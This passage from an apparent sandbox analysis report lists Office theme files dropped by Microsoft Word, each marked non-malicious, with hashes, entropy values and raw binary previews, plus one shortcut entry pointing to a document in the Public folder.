                                                                                                                                              Preview:L..................F.... ....V._zQ.....bzQ....._zQ..=4...........................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH.YC.....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......YS...Public..f......O.I.YS.....+...............<.....w,F.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....l.2.=4...YS. .RDC7DI~1.DOC..P......YS..YS............................C.r.d.c.7.d.i.6.c.c.s...d.o.c.x.......N...............-.......M............F.......C:\Users\Public\rdc7di6ccs.docx..(.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.r.d.c.7.d.i.6.c.c.s...d.o.c.x..........v..*.cM.jVD.Es.!...`.......X.......138727...........hT..CrF.f4... ..1.m....,.......hT..CrF.f4... ..1.m....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):562113
                                                                                                                                              Entropy (8bit):7.67409707491542
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                              MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                              SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                              SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                              SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1649585
                                                                                                                                              Entropy (8bit):7.875240099125746
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                              MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                              SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                              SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                              SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):558035
                                                                                                                                              Entropy (8bit):7.696653383430889
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                              MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                              SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                              SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                              SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):570901
                                                                                                                                              Entropy (8bit):7.674434888248144
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                              MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                              SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                              SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                              SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):523048
                                                                                                                                              Entropy (8bit):7.715248170753013
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                              MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                              SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                              SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                              SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3078052
                                                                                                                                              Entropy (8bit):7.954129852655753
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                              MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                              SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                              SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                              SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):777647
                                                                                                                                              Entropy (8bit):7.689662652914981
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                              MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                              SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                              SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                              SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):924687
                                                                                                                                              Entropy (8bit):7.824849396154325
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                              MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                              SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                              SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                              SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):966946
                                                                                                                                              Entropy (8bit):7.8785200658952
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                              MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                              SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                              SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                              SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1204049
                                                                                                                                              Entropy (8bit):7.92476783994848
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                              MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                              SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                              SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                              SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):486596
                                                                                                                                              Entropy (8bit):7.668294441507828
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                              MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                              SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                              SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                              SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):976001
                                                                                                                                              Entropy (8bit):7.791956689344336
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                              MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                              SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                              SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                              SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)

                                                                                                                                              Download File
